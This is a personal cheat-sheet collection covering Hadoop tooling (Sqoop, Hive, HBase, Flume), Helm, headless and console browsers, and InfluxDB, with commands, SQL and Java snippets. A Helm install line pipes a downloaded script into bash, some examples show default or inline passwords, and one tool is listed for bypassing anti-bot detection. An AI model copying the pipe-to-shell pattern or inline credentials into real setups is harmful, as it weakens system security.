setup after installation, init, ambari password reset

  • shell web client (aka shell-in-a-box): localhost:4200 root / hadoop
  • ambari-admin-password-reset
  • ambari-agent restart
  • login into ambari: localhost:8080 admin/{your password}

Zeppelin UI

http://localhost:9995 user: maria_dev pass: maria_dev

install jupyter for spark

https://hortonworks.com/hadoop-tutorial/using-ipython-notebook-with-apache-spark/

SPARK_MAJOR_VERSION is set to 2, using Spark2
Error in pyspark startup:
IPYTHON and IPYTHON_OPTS are removed in Spark 2.0+. Remove these from the environment and set PYSPARK_DRIVER_PYTHON and PYSPARK_DRIVER_PYTHON_OPTS instead.
to use Spark 1, just set the variable inside the script: SPARK_MAJOR_VERSION=1
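a sketch of setting it in the sandbox shell before starting pyspark

export SPARK_MAJOR_VERSION=1
pyspark
# or for a single invocation only
SPARK_MAJOR_VERSION=1 pyspark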

import

Import destinations:

  • text files
  • binary files
  • HBase
  • Hive
sqoop import --connect jdbc:mysql://127.0.0.1/crm --username myuser --password mypassword --table customers --target-dir /crm/users/michael.csv  

additional parameter to control the number of mappers working in parallel:

--split-by customer_id_pk
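a sketch combining the options above ( connection values are the same illustrative ones as in the import example )

sqoop import \
  --connect jdbc:mysql://127.0.0.1/crm \
  --username myuser --password mypassword \
  --table customers \
  --split-by customer_id_pk \
  --num-mappers 8 \
  --target-dir /crm/users/customers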

additional parameters:

--fields-terminated-by ','
--columns "name, age, address"
--where "age>30"
--query "select name, age, address from customers where age>30"

additional import parameters:

--as-textfile
--as-sequencefile
--as-avrodatafile

export

export modes:

  • insert
sqoop export --connect jdbc:mysql://127.0.0.1/crm --username myuser --password mypassword --export-dir /crm/users/michael.csv --table customers 
  • update
sqoop export --connect jdbc:mysql://127.0.0.1/crm --username myuser --password mypassword --export-dir /crm/users/michael.csv --table customers --update-key user_id
  • call ( store procedure will be executed )
sqoop export --connect jdbc:mysql://127.0.0.1/crm --username myuser --password mypassword --export-dir /crm/users/michael.csv --call customer_load

additional export parameters:

# rows per single insert statement
-Dsqoop.export.records.per.statement
# number of insert statements per transaction ( before commit )
-Dsqoop.export.statements.per.transaction
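a sketch of an export tuned with these properties ( generic -D options go right after the tool name; connection values are illustrative )

sqoop export \
  -Dsqoop.export.records.per.statement=100 \
  -Dsqoop.export.statements.per.transaction=100 \
  --connect jdbc:mysql://127.0.0.1/crm \
  --username myuser --password mypassword \
  --table customers \
  --export-dir /crm/users/michael.csv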

java application run, java run, java build

mapr classpath
mapr classpath glob

compile java app, execute java app

javac -classpath `mapr classpath` MyProducer.java
java -classpath `mapr classpath`:. MyProducer

MDF4 reading

import mdfreader
header = mdfreader.mdfinfo4.Info4("file.MF4")
header.keys()
header['AT'].keys()
header['AT'][768]['at_embedded_data']
info=mdfreader.mdfinfo()
info.listChannels("file.MF4")
from asammdf import MDF4 as MDF
mdf = MDF("file.MF4")

HCatalog

documentation
used for sharing the Hive metastore ( schema ) with other tools

table description

hcat -e "describe school_explorer"
hcat -e "describe formatted school_explorer"

SQL engines

  • Hive ( HiveQL )

    for executing SQL-like queries
    transforms the request into a directed acyclic graph ( DAG )

  • Impala
  • Phoenix ( HBase )
  • Drill ( schema-less sql )
  • BigSQL ( PostgreSQL + Hadoop )
  • Spark

workflow scheduler

START -> ACTION -> OK | ERROR

Cascading

TBD

Scalding

TBD


Hadoop streaming.

  • Storm ( real time streaming solution )
  • Spark ( near real time streaming, uses microbatching )
  • Samza ( streaming on top of Kafka )
  • Flink ( common approach to batch and stream code development )

Data storage, NoSQL

Accumulo

TBD

Druid

TBD

Sqoop ( SQl to/from hadOOP )

command line tool
the JDBC driver for the jdbc url must be present in: $SQOOP_HOME/lib
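a sketch of placing the driver ( jar name and version are illustrative )

cp mysql-connector-java-8.0.28.jar $SQOOP_HOME/lib/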

Flume

A Flume agent is a JVM process that hosts the components responsible for moving data ( see the sketch after the diagram below ).

(Event is generated)
        ↓
[ Source ]  → converts incoming data → [ Event ]
        ↓
[ Channel ]  ← holds the event temporarily
        ↓
[ Sink ]  → writes it to HDFS (or other systems)
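a minimal sketch of an agent definition matching the picture above ( netcat source -> memory channel -> hdfs sink; agent name, port and hdfs path are illustrative )

cat > example-agent.conf <<'EOF'
a1.sources  = r1
a1.channels = c1
a1.sinks    = k1

a1.sources.r1.type = netcat
a1.sources.r1.bind = 0.0.0.0
a1.sources.r1.port = 44444
a1.sources.r1.channels = c1

a1.channels.c1.type = memory
a1.channels.c1.capacity = 1000

a1.sinks.k1.type = hdfs
a1.sinks.k1.hdfs.path = hdfs:///data/flume/events
a1.sinks.k1.channel = c1
EOF

flume-ng agent --conf-file example-agent.conf --name a1 -Dflume.root.logger=INFO,console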

Cluster management

  • cloudera manager

examples of map reduce

"Inverted Index":

  1. input data:
youtube.com: dog, gaming, music, video  
amazon.com: gaming, music, book  
safari.com: book, video
  1. map:
("dog", "youtube.com")
("gaming", "youtube.com")
("music", "youtube.com")
("video", "youtube.com")
("gaming", "amazon.com")
("music", "amazon.com")
("book", "amazon.com")
("book", "safari.com")
("video", "safari.com")
  1. shuffle:
dog: [youtube.com]  
gaming: [youtube.com, amazon.com]  
music: [youtube.com, amazon.com]  
video: [youtube.com, safari.com]  
book: [amazon.com, safari.com]
  1. sort
book: [amazon.com, safari.com]  
dog: [youtube.com]  
gaming: [amazon.com, youtube.com]  
music: [amazon.com, youtube.com]  
video: [safari.com, youtube.com]
  1. reduce
book: 2
dog: 1
gaming: 2
music: 2
video: 2
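the same inverted-index flow can be emulated locally with a shell pipeline ( map -> sort as shuffle -> reduce ); input.txt is assumed to contain the lines from step 1

cat input.txt \
  | awk -F': ' '{n=split($2,w,", "); for(i=1;i<=n;i++) print w[i]"\t"$1}' \
  | sort \
  | awk -F'\t' '{cnt[$1]++} END{for(k in cnt) print k": "cnt[k]}' \
  | sort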

max value

  1. input data
london 9c time: 10:12
kiev 5c time: 14:15
vienna 5c time 20:07
london 11c time: 10:12
kiev 7c wind 3ms
  1. map
london 9
kiev 5
vienna 5
london 11
kiev 7
  1. shuffle
london 9,11
kiev 5,7
vienna 5
  1. reduce
london 11
kiev 7
vienna 5
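a sketch of submitting such a job with Hadoop Streaming; the jar location, input/output paths and the mapper.sh / reducer.sh scripts ( implementing the map and reduce steps above ) are illustrative

hadoop jar $HADOOP_HOME/share/hadoop/tools/lib/hadoop-streaming-*.jar \
  -input /data/weather.txt \
  -output /data/weather-max \
  -mapper mapper.sh \
  -reducer reducer.sh \
  -file mapper.sh -file reducer.sh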

TODO

download all slides from stepik - for repeating and creating xournals

HBase cheat sheet

  • distributed,
  • column-oriented persistent multidimensional sorted map
  • autoscale
  • storing column-family into memory/disc
  • disc = hdfs or filesystem
  • column family (limited number) can be configured to:
    • compress
    • versions count
    • TimeToLive 'veracity'
    • in memory/on disc
    • separate file
  • key - is byte[], value is byte[]
  • scan by key
  • scan by keys range
  • schema free
  • each record has a version
  • TableName - filename
  • record looks like: RowKey ; ColumnFamilyName ; ColumnName ; Timestamp record
    record-view
  • table can be divided into a number of regions ( sorted by key with start...end keys and controlled by HMaster )
  • region has default size 256Mb
data is sparse - a lot of columns have null values
fast data retrieval by 'key of the row' + 'column name'
consists of: (HBase HMaster) *---> (HBase Region Server)

SQL for Hbase - Phoenix SQL

Why HBase

hbase-why.png

HBase Architecture

hbase-architecture.jpg

HBase ACID

hbase-acid.png

logical view

hbase-record-logical-view.png

physical view

hbase-record-phisical-view.png

logical to physical view

hbase-logical-to-phisical-view.png

Table characteristics

hbase-table-characteristics.png

Column-Family

hbase-column-family.png

manage HBase

start/stop hbase

$HBASE_HOME/bin/start-hbase.sh
$HBASE_HOME/bin/stop-hbase.sh

interactive shell

cheat sheet

$HBASE_HOME/bin/hbase shell

path to jars from hbase classpath

hbase classpath

commands

  • list of the tables
list
  • create table
create 'mytable1', 'column_family1'
  • description of the table
describe 'my_space:mytable1'
  • count records
count 'my_space:mytable1'
  • delete table
disable 'mytable1'
drop 'mytable1'
  • iterate through a table, iterate with range
scan 'my_space:mytable1'
scan 'my_space:mytable1', {STARTROW=>"00223cfd-8b50-979d29164e72:1220", STOPROW=>"00223cfd-8b50-979d29164e72:1520"}
  • save results into a file
echo " scan 'my_space:mytable1', {STARTROW=>"00223cfd-8b50-979d29164e72:1220", STOPROW=>"00223cfd-8b50-979d29164e72:1520"} " | hbase shell > out.txt
  • insert data, update data
put 'mytable1', 'row0015', 'cf:MyColumnFamily2', 'my value 01'
  • read data
get 'mytable1', 'row0015'

Java

java app

java \
    -cp /opt/cloudera/parcels/SPARK2/lib/spark2/jars/*:`hbase classpath`:{{ deploy_dir }}/lib/ingest-pipeline-orchestrator-jar-with-dependencies.jar \
    -Djava.security.auth.login.config={{ deploy_dir }}/res/deploy.jaas \
    com.bmw.ad.ingest.pipeline.orchestrator.admin.TruncateSessionEntriesHelper \
    --hbase-zookeeper {{ hbase_zookeeper }} \
    --ingest-tracking-table-name {{ ingest_tracking_table }} \
    --file-meta-table-name {{ file_meta_table }} \
    --component-state-table-name {{ component_state_table }} \
    --session-id $1
scan records ( fragment )

  Scan scan = new Scan(Bytes.toBytes(startAndStopRow), Bytes.toBytes(startAndStopRow));
  scan.addColumn(FAMILY_NAME, COLUMN_NAME);
  // scan.setFilter(new FirstKeyOnlyFilter());
  ResultScanner scanner = this.table.getScanner(scan);
  try{
   for ( Result result : scanner) { // each next() call - RPC call to server
     System.out.println(result);
   }
  }finally{
   scanner.close(); // !!! IMPORTANT !!!
  }
}

get value

Get record = new Get(Bytes.toBytes("row_key"));
record.addColumn(Bytes.toBytes("column_family"), Bytes.toBytes("column_name"));
Result result = mytable1.get(record);
// or read a single cell value from the result
byte[] value = result.getValue(Bytes.toBytes("column_family"), Bytes.toBytes("column_name"));

put record

Put row=new Put(Bytes.toBytes("rowKey"));
row.add(Bytes.toBytes("column_family"), Bytes.toBytes("column"), Bytes.toBytes("value1"));
table.put(row);
package com.learn.hbase.client;

import java.io.IOException;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hbase.HBaseConfiguration;
import org.apache.hadoop.hbase.TableName;
import org.apache.hadoop.hbase.client.Connection;
import org.apache.hadoop.hbase.client.ConnectionFactory;
import org.apache.hadoop.hbase.client.Put;
import org.apache.hadoop.hbase.client.Table;
import org.apache.hadoop.hbase.util.Bytes;

public class PutHBaseClient {

public static void main(String[] args) throws IOException {

  Configuration conf = HBaseConfiguration.create();

  Connection connection = ConnectionFactory.createConnection(conf);
  Table table = connection.getTable(TableName.valueOf("test"));
  try {

    Put put1 = new Put(Bytes.toBytes("row1"));

    put1.addColumn(Bytes.toBytes("cf"), Bytes.toBytes("qual1"), Bytes.toBytes("ValueOneForPut1Qual1"));
    put1.addColumn(Bytes.toBytes("cf"), Bytes.toBytes("qual2"), Bytes.toBytes("ValueOneForPut1Qual2"));

    table.put(put1);

  } finally {
    table.close();
    connection.close();
  }

}

}

update record

  • checkAndPut - compares the value with the current value from the hbase according to the passed CompareOp. CompareOp=EQUALS Adds the value to the put object if expected value is equal.
  • checkAndMutate - compares the value with the current value from the hbase according to the passed CompareOp.CompareOp=EQUALS Adds the value to the rowmutation object if expected value is equal.
    row mutation example
RowMutations mutations = new RowMutations(row);
//add new columns
Put put = new Put(row);
put.add(cf, col1, v1);
put.add(cf, col2, v2);

Delete delete = new Delete(row);
delete.deleteFamily(cf1, now);

//delete column family and add new columns to same family
mutations.add(delete);
mutations.add(put);

table.mutateRow(mutations);

delete value

Delete row = new Delete(Bytes.toBytes("rowKey"));
row.deleteColumn(Bytes.toBytes("column_family"), Bytes.toBytes("column"));
table.delete(row);
// or delete all versions of a column / the whole column family
row.deleteColumns(Bytes.toBytes("column_family"), Bytes.toBytes("column"), timestamp);
row.deleteFamily(Bytes.toBytes("column_family"));
table.delete(row);

batch operation

Put put = new Put(Bytes.toBytes("row1"));
put.addColumn(Bytes.toBytes("cf"), Bytes.toBytes("qual1"), Bytes.toBytes("value1"));
Get get = new Get(Bytes.toBytes("row2"));

Object[] results = new Object[2];
table.batch(List.of(put, get), results);

create table

Configuration config = HBaseConfiguration.create();

HBaseAdmin admin = new HBaseAdmin(config);

HTableDescriptor tableDescriptor = new HTableDescriptor(Bytes.toBytes("my_table1"));
HColumnDescriptor columns = new HColumnDescriptor(Bytes.toBytes("column_family_1"));
tableDescriptor.addFamily(columns);
admin.createTable(tableDescriptor);
admin.isTableAvailable(Bytes.toBytes("my_table1"));

Helm cheat sheet

package manager for Kubernetes
( similar to pip for python, similar to apt for debian )

links

helm charts

Architecture

main components

installation

sudo snap install helm --classic
curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | bash

de-installation

helm reset

initialization

helm init

# add new repo
helm repo add my_local_repo https://charts.bitnami.com/bitnami
# helm install --set replica.replicaCount=1 my_local_repo/redis

# sync latest available packages
helm repo update

useful variables

# the location of Helm's configuration
echo $HELM_HOME
# the host and port that Tiller is listening on
echo $TILLER_HOST
# the path to the helm command on your system
echo $HELM_BIN
# the full path to this plugin (not shown above, but we'll see it in a moment).
echo $HELM_PLUGIN_DIR

analyze local package

helm inspect { folder }
helm lint { folder }

search remote package

helm search {keyword}
helm inspect {full name of the package}

information about remote package

helm info {name of resource}
helm status {name of resource}

create package locally

helm create {chart name}

folder structure

create package with local templates

ls -la ~/.helm/starters/

install package

helm install { full name of the package }
helm install --name {my name for new package} { full name of the package }
helm install --name {my name for new package} --namespace {namespace} -f values.yml --debug --dry-run { full name of the package }

# some examples 
helm install bitnami/postgresql
helm install oci://registry-1.docker.io/bitnamicharts/postgresql
helm install my_own_postgresql bitnami/postgresql

install aws plugin

helm plugin install https://github.com/hypnoglow/helm-s3.git

list of installed packages

helm list
helm list --all
helm ls

package upgrade

local package

helm upgrade {release name} . --set replicas=2,maria.db.password="new password"

package by name

helm upgrade {name of package} {folder with helm scripts} --set replicas=2

check upgrade

helm history
helm rollback {name of package} {revision of history}

remove package

helm delete --purge {name of package}

trouble shooting

issue with 'helm list'

E1209 22:25:57.285192    5149 portforward.go:331] an error occurred forwarding 40679 -> 44134: error forwarding port 44134 to pod de4963c7380948763c96bdda35e44ad8299477b41b5c4958f0902eb821565b19, uid : unable to do port forwarding: socat not found.
Error: transport is closing

solution

sudo apt install socat

incompatible version of client and server

Error: incompatible versions client[v2.12.3] server[v2.11.0]

solution

helm init --upgrade
kubectl get pods --namespace kube-system # waiting for start Tiller
helm version

issue with postgresql, issue with mapping PV ebs.csi.aws.com

"message": "running PreBind plugin \"VolumeBinding\": binding volumes: timed out waiting for the condition",

create local storage class instead of mapping to external ( EBS )

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: local-storage
provisioner: kubernetes.io/no-provisioner
volumeBindingMode: Immediate
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: local-storage
spec:
  capacity:
    storage: 8Gi
  volumeMode: Filesystem
  accessModes:
    - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  storageClassName: local-storage
  local:
    path: /tmp
  nodeAffinity:
    required:
      nodeSelectorTerms:
        - matchExpressions:
            - key: kubernetes.io/hostname
              operator: In
              values:
                - <NODE_INSTANCE_IP>
helm repo add $HELM_BITNAMI_REPO https://charts.bitnami.com/bitnami
helm install $K8S_SERVICE_POSTGRESQL $HELM_BITNAMI_REPO/postgresql --set global.storageClass=local-storage

Hive cheat sheet

fixed data structure ( Pig - free data structure ) documentation description description cheat sheet sql to hive quick guide

full SQL is not supported, especially:

  • transactions
  • materialized view
  • update
  • non-equality joins

metastore

HCatalog can be one of:

  • embedded in-process metastore in-process database
  • local in-process metastore out-of-process database
  • remote out-of-process metastore out-of-process database

hive command line interfaces

cheat sheet run interpreter

hive

run existing script into file

hive -f <filename>

new interpreter

beeline

Data units

  • Database - namespace for tables separation
  • Table - unit of data inside some schema ( database )
  • Partition - virtual column ( example below )
  • Buckets - data of a column can be divided into buckets based on a hash value

Partition and Buckets serve to speed up queries during reading/joining ( a bucketed-table DDL sketch follows the example below ).

example of bucket existence

 database -> $WH/testdb.db
    table -> $WH/testdb.db/T
partition -> $WH/testdb.db/T/date=01012013
   bucket -> $WH/testdb.db/T/date=01012013/000032_0
( only 'bucket' is a file )
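a sketch of DDL that produces such partition directories and bucket files ( database, table and column names are illustrative )

hive -e "
CREATE TABLE testdb.T (
  id   INT,
  name STRING
)
PARTITIONED BY (dt STRING)
CLUSTERED BY (id) INTO 32 BUCKETS
STORED AS TEXTFILE;
"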

databases

SHOW DATABASES;
USE default;
-- describe
DESCRIBE DATABASE my_own_database;
DESCRIBE DATABASE EXTENDED my_own_database;
-- delete database
DROP DATABASE IF EXISTS my_own_database;
-- alter database
ALTER DATABASE my_own_database SET DBPROPERTIES(...)

show all tables for selected database

SHOW TABLES;

DDL

types primitive

TINYINT SMALLINT INT BIGINT BOOLEAN ( TRUE/FALSE ) FLOAT DOUBLE DECIMAL STRING VARCHAR TIMESTAMP ( YYYY-MM-DD HH:MM:SS.ffffffff ) DATE ( YYYY-MM-DD )

cast ( string_column_value as FLOAT )

types complex

  • Arrays
array('a1', 'a2', 'a3')
  • Structs
struct('a1', 'a2', 'a3')
  • Maps
map('first', 1, 'second', 2, 'third', 3)
  • Union
create_union

create table

documentation table types:

  • managed - data stored in subdirectories of 'hive.metastore.warehouse.dir'; dropping a managed table will drop all data on the disc too
  • external - data stored outside 'hive.metastore.warehouse.dir'; dropping the table will delete metadata only: CREATE EXTERNAL TABLE ... LOCATION '/my/path/to/folder'

create managed table with regular expression

CREATE TABLE apachelog (
  host STRING,
  identity STRING,
  user STRING,
  time STRING,
  request STRING,
  status STRING,
  size STRING,
  referer STRING,
  agent STRING)
ROW FORMAT SERDE 'org.apache.hadoop.hive.serde2.RegexSerDe'
WITH SERDEPROPERTIES (
  "input.regex" = "([^]*) ([^]*) ([^]*) (-|\\[^\\]*\\]) ([^ \"]*|\"[^\"]*\") (-|[0-9]*) (-|[0-9]*)(?: ([^ \"]*|\".*\") ([^ \"]*|\".*\"))?"
)
STORED AS TEXTFILE;

create managed table with complex data

CREATE TABLE users(
id INT,
name STRING,
departments ARRAY<STRING>
) ROW FORMAT DELIMITED FIELDS TERMINATED BY ','
            COLLECTION ITEMS TERMINATED BY '|'
STORED AS TEXTFILE;

1, Mike, sales|manager
2, Bob,  HR
3, Fred, manager| HR
4,Klava, manager|sales|developer|cleaner

create managed table with partition

CREATE TABLE users(
id INT,
name STRING,
departments ARRAY<STRING>
)
 PARTITIONED BY (office_location STRING ) 
 ROW FORMAT DELIMITED FIELDS TERMINATED BY ','
            COLLECTION ITEMS TERMINATED BY ':'
STORED AS TEXTFILE;
--
-- representation on HDFS
$WH/mydatabase.db/users/office_location=USA
$WH/mydatabase.db/users/office_location=GERMANY

create external table from csv CSV format

CREATE EXTERNAL TABLE IF NOT EXISTS school_explorer(
	grade boolean,
	is_new boolean, 
	location string,
	name string, 
	sed_code STRING,
	location_code STRING, 
	district int,
	latitude float,
	longitude float,
	address string
)COMMENT 'School explorer from Kaggle'
ROW FORMAT DELIMITED FIELDS TERMINATED BY ',' 
STORED AS TEXTFILE LOCATION '/data/';
-- do not specify filename !!!!
-- ( all files into folder will be picked up )

create table from CSV format file

CREATE TABLE my_table(a string, b string, ...)
ROW FORMAT SERDE 'org.apache.hadoop.hive.serde2.OpenCSVSerde'
WITH SERDEPROPERTIES (
   "separatorChar" = "\t",
   "quoteChar"     = "'",
   "escapeChar"    = "\\"
)  
STORED AS TEXTFILE LOCATION '/data/';

create table from 'tab' delimiter

CREATE TABLE web_log(viewTime INT, userid BIGINT, url STRING, referrer STRING, ip STRING) 
ROW FORMAT DELIMITED FIELDS TERMINATED BY '\t'; 
LOAD DATA LOCAL INPATH '/home/mapr/sample-table.txt' INTO TABLE web_log;

JSON

CREATE TABLE my_table(a string, b bigint, ...)
ROW FORMAT SERDE 'org.apache.hive.hcatalog.data.JsonSerDe'
STORED AS TEXTFILE;

external Parquet

create external table parquet_table_name (x INT, y STRING)
  ROW FORMAT SERDE 'parquet.hive.serde.ParquetHiveSerDe'
  STORED AS 
    INPUTFORMAT "parquet.hive.DeprecatedParquetInputFormat"
    OUTPUTFORMAT "parquet.hive.DeprecatedParquetOutputFormat"
    LOCATION '/test-warehouse/tinytable';

drop table

DROP TABLE IF EXISTS users;

alter table - rename

ALTER TABLE users RENAME TO external_users;

alter table - add columns

ALTER TABLE users ADD COLUMNS(
age INT, children BOOLEAN
);

View

CREATE VIEW young_users AS SELECT name, age FROM users WHERE age<21;
DROP VIEW IF EXISTS young_users;

Index

create index for some specific field, will be saved into separate file

CREATE INDEX users_name ON TABLE users ( name ) AS 'COMPACT' WITH DEFERRED REBUILD;

show index

SHOW INDEX ON users;

delete index

DROP INDEX users_name on users;

DML


load data into table

-- local file system
LOAD DATA LOCAL INPATH '/home/user/my-prepared-data/' OVERWRITE INTO TABLE apachelog;
-- hdfs
LOAD DATA INPATH '/data/' OVERWRITE INTO TABLE apachelog;
-- load data with partitions, override files on hdfs if they are exists ( without OVERWRITE )
LOAD DATA INPATH '/data/users/country_usa' INTO TABLE users PARTITION (office_location='USA', children='TRUE')
-- example of partition location: /user/hive/warehouse/my_database/users/office_location=USA/children=TRUE

data will be copied and saved into /user/hive/warehouse; if a cell has a wrong format, its value will be 'null'

insert data into table using select, insert select

INSERT OVERWRITE TABLE <table destination>
-- INSERT OVERWRITE TABLE <table destination>
-- CREATE TABLE <table destination>
SELECT <field1>, <field2>, ....
FROM <table source> s JOIN <table source another> s2 ON s.key_field=s2.key_field2
-- LEFT OUTER
-- FULL OUTER

export data from Hive, data external copy, data copy

INSERT OVERWRITE LOCAL DIRECTORY '/home/users/technik/users-db-usa'
SELECT name, office_location, age
FROM users
WHERE office_location='USA'

select

SELECT * FROM users LIMIT 1000;
SELECT name, department[0], age FROM users;
SELECT name, struct_filed_example.post_code FROM users ORDER BY age DESC;
SELECT .... FROM users GROUP BY age HAVING MIN(age)>50
-- from sub-query
FROM ( SELECT * FROM users WHERE age>30 ) custom_sub_query SELECT custom_sub_query.name, custom_sub_query.office_location WHERE children==FALSE;


functions

-- if regular expression B can be applied to A
A RLIKE B
A REGEXP B
-- split string to elements
split
-- flat map, array to separated fields - instead of one field with array will be many record with one field
explode( array field )
-- extract part of the date: year, month, day
year(timestamp field)
-- extract json object from json string
get_json_object
-- common functions with SQL-92
A LIKE B
round
ceil
substr
upper
length
count
sum
avg

user defined functions

types

  • UDF ( user defined function )
  • UDAF ( user defined aggregate function )
  • UDTF ( user defined table-generating function )

UDF, custom functions

<dependencies>
    <dependency>
        <groupId>org.apache.hadoop</groupId>
        <artifactId>hadoop-client</artifactId>
        <version>2.7.3</version>
        <scope>provided</scope>
    </dependency>
    <dependency>
        <groupId>org.apache.hive</groupId>
        <artifactId>hive-exec</artifactId>
        <version>1.2.1</version>
        <scope>provided</scope>
    </dependency>
</dependencies>
package com.mycompany.hive.lower;
import org.apache.hadoop.hive.ql.exec.Description;
import org.apache.hadoop.hive.ql.exec.UDF;
import org.apache.hadoop.io.*;

// Description of the UDF
@Description(
    name="ExampleUDF",
    value="analogue of lower in Oracle .",
    extended="select ExampleUDF(deviceplatform) from table;"
)
public class ExampleUDF extends UDF {
    public String evaluate(String input) {
        if(input == null)
            return null;
        return input.toLowerCase();
    }
}

after compilation into my-udf.jar

  hive> add jar my-udf.jar
  hive> create temporary function ExampleUDF using "com.mycompany.hive.lower";
  hive> SELECT ExampleUDF(value) from table;

Streaming: MAP(), REDUCE(), TRANSFORM()

SELECT TRANSFORM (name, age) 
USING '/bin/cat'
AS name, age FROM my_own_database.users;

troubleshooting

query explanation and understanding of the directed acyclic graph ( DAG )

EXPLAIN SELECT * FROM users ORDER BY age DESC;
EXPLAIN EXTENDED SELECT * FROM users ORDER BY age DESC;

jdbc connection issue:

TApplicationException: Required field 'client_protocol' is unset! 

reason:

This indicates a version mismatch between client and server, namely that the client is newer than the server, which is the case here.

solution:

need to decrease version of the client
    compile group: 'org.apache.hive', name: 'hive-jdbc', version: '1.1.0'

hive html gui

  • ambari
  • hue

## 1. **Headless Browsers & Automation Frameworks**

### **Puppeteer** (Node.js)
- Headless Chrome/Chromium automation.
- Excellent for rendering JS-heavy pages.
- [GitHub](https://github.com/puppeteer/puppeteer)

### **Selenium** (Multiple languages)
- Automation for all major browsers.
- Can be run headless.
- [Website](https://www.selenium.dev/)

### **Playwright** (Node.js, Python, Java, .NET)
- Multi-browser support (Chromium, WebKit, Firefox).
- Feature-rich, modern alternative to Puppeteer.
- [GitHub](https://github.com/microsoft/playwright)

### **Nightmare.js** (Node.js)
- Headless automation for Electron.
- Simpler than Puppeteer/Playwright, but less maintained.
- [GitHub](https://github.com/segmentio/nightmare)

### **Cypress** (JavaScript)
- Primarily for end-to-end testing, but can be used to extract rendered HTML.
- [Website](https://www.cypress.io/)

Here is a list of popular **console (text-based) browsers** with the ability to dump the screen or page content:

---

2. Console Browsers

1. w3m

  • Description: Text-based web browser with support for tables, frames, SSL, and images (in terminals with graphics support).
  • Dump screen:
    w3m -dump URL_or_file.html
  • Homepage: w3m

2. lynx

  • Description: One of the oldest and most well-known text-based browsers. Highly configurable.
  • Dump screen:
    lynx -dump URL_or_file.html
  • Homepage: lynx

3. links

  • Description: Text browser with support for HTML tables and frames. Has both text and graphics mode.
  • Dump screen:
    links -dump URL_or_file.html
  • Homepage: links

4. elinks

  • Description: An advanced fork of links with more features and scripting support.
  • Dump screen:
    elinks -dump URL_or_file.html
  • Homepage: elinks

5. browsh

  • Description: Modern text-based browser that uses Firefox in the background. Renders complex JS-heavy pages as text/graphics in the terminal.
  • Dump screen (screenshot as text):
    browsh https://example.com
    (No explicit "-dump" option, use with terminal output capture: e.g., script or tee)
  • Homepage: brow.sh

Summary Table

| Browser | Dump Command Example | Notes |
|---|---|---|
| w3m | w3m -dump URL_or_file.html | Good for quick dumps |
| lynx | lynx -dump URL_or_file.html | Highly scriptable |
| links | links -dump URL_or_file.html | Simple and effective |
| elinks | elinks -dump URL_or_file.html | More features than links |
| browsh | browsh URL (capture terminal out) | Best for JS-heavy pages |

3. Command Line Utilities

htmlunit (Java)

  • Headless browser written in Java.
  • Good for Java-based scraping and automation.
  • Website

PhantomJS (JavaScript - DEPRECATED)

  • Headless WebKit.
  • No longer maintained, but still used.
  • Website

CasperJS (JavaScript - DEPRECATED)

  • Wrapper for PhantomJS for easier scripting.
  • Website

Splash (Python/Lua)

  • Headless browser with HTTP API, built on Chromium.
  • Excellent for use with Scrapy.
  • GitHub

4. Browser Automation via Scripting

AppleScript + Safari/Chrome (macOS only)

  • Can script browsers on macOS to dump HTML.

AutoHotkey / AutoIt (Windows)

  • Windows scripting to automate browser actions.

5. Other Notable Libraries/Tools

BeautifulSoup + Selenium (Python)

  • Use Selenium to render, then BeautifulSoup to parse.

WebDriverIO (Node.js)

  • Selenium-based browser automation for Node.js.
  • Website

TestCafe (Node.js)

  • Automation and testing for web apps.
  • Website

Rod (Go)

  • DevTools driver for Chrome, written in Go.
  • GitHub

chromedp (Go)

  • High-level Chrome DevTools Protocol client for Go.
  • GitHub

Pyppeteer (Python)

  • Python port of Puppeteer.
  • GitHub

undetected-chromedriver (Python)

  • Python package to bypass anti-bot detection.
  • GitHub

6. Cloud/Remote APIs

Browserless

  • Hosted headless browser service (Puppeteer compatible).
  • Website

ScrapingBee, ScraperAPI, etc.

  • API services that can return rendered HTML.

Summary Table

Tool/Library Language(s) Headless Maintained JS Rendering Link
Puppeteer Node.js Yes https://github.com/puppeteer/puppeteer
Selenium Many Yes https://www.selenium.dev/
Playwright Node.js, Python, Java Yes https://github.com/microsoft/playwright
Nightmare.js Node.js Yes ~ https://github.com/segmentio/nightmare
Cypress JavaScript Yes https://www.cypress.io/
htmlunit Java Yes https://htmlunit.sourceforge.io/
PhantomJS JavaScript Yes https://phantomjs.org/
CasperJS JavaScript Yes https://casperjs.org/
Splash Python/Lua Yes https://github.com/scrapinghub/splash
WebDriverIO Node.js Yes https://webdriver.io/
TestCafe Node.js Yes https://testcafe.io/
Rod Go Yes https://github.com/go-rod/rod
chromedp Go Yes https://github.com/chromedp/chromedp
Pyppeteer Python Yes https://github.com/pyppeteer/pyppeteer
undetected-chromedriver Python Yes https://github.com/ultrafunkamsterdam/undetected-chromedriver
Browserless/API Any (via HTTP) Yes https://www.browserless.io/

InfluxDB cheat sheet

InfluxDB official documentation TICK:

  • Telegraf
  • InfluxDB
  • Chronograf
  • Kapacitor

Data Model:

InfluxDB has a specialized data model optimized for time-series data. It organizes data into :

  • Database - container for organizing related data, in version 2.x - Bucket
  • Retention Policy - one or more inside database: duration, replication, TimeToLive
  • measurements - one or more inside Retention Policy ( like tables in an RDBMS )
  • tags - are indexed metadata associated with data points
  • fields - store the actual data values
  • timestamps - represent when the data was recorded
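how one written point maps onto the model above ( line protocol; names and values are illustrative )

# <measurement>,<tag_key>=<tag_value> <field_key>=<field_value> <unix_timestamp>
# temperature,location=1 value=90 1472666050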

start with default config

INFLUX_TAG=2.7.1
# INFLUX_TAG=latest
docker rm influxdb
docker run --name influxdb \
    --publish 8086:8086 \
    --volume influxdb:/var/lib/influxdb \
    influxdb:${INFLUX_TAG}

start influx with custom config

# INFLUX_TAG=2.0
INFLUX_TAG=2.7.1

docker run --name influxdb \
    --publish 8086:8086 \
    --volume influxdb:/var/lib/influxdb \
    --volume $PWD/config.yml:/etc/influxdb2/config.yml \
    influxdb:${INFLUX_TAG}

# influxd -config /path/to/influxdb.conf

config example

reporting-disabled = true

[meta]
  dir = "/var/lib/influxdb/meta"

[data]
  dir = "/var/lib/influxdb/data"
  wal-dir = "/var/lib/influxdb/wal"

[http]
  enabled = true
  bind-address = ":8086"
  auth-enabled = true

connect to existing container

docker exec -it influxdb /bin/bash

use Influx CLI

print current instance config

influxd print-config
INFLUX_USER=my-user
